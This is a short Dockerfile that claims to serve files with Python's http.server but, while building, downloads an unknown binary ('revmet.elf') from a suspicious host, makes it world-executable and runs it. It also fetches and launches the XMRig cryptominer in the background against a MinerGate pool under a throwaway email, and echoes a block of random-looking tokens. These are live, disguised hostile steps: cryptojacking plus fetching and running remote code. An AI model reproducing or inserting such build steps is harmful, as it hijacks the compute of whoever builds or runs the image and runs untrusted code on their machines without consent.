FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo hKnyYzjHgj8nRGlDJAzP5KBnAxnSuAMM 4gnVjcGEL8AIzP9NOG93AU8GYREUgbG0 gYkAzs8wthBSd107UkjKD9EUYdZNwmqN Qkg8BhNOsRnjsWAbPM9c9vkg6otDYid5 Rstz5n6voPAtV9l5uNETMvEysh9vGRwj 2D0Ps00bbgVHEGXXhVm89xcxMsNFjnzS GGvQGppAeYk5YMD2jJPF7nytBqLJnXBd hSXWG6245TKImkNGxSm98WOlL8yY2qOb 6cpmtUHNJz5cSmQKfAJ71DxTe6X4ee5W Y6HRHq0VEvd2NfeEfM4ZDsWCp4bSJ8Vp jXDHgv0Y8ncpag2LhExYoXTQkG5LvkJh HTF1dbSoHFcixXEy6DZpksZR9NDHhiRT DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]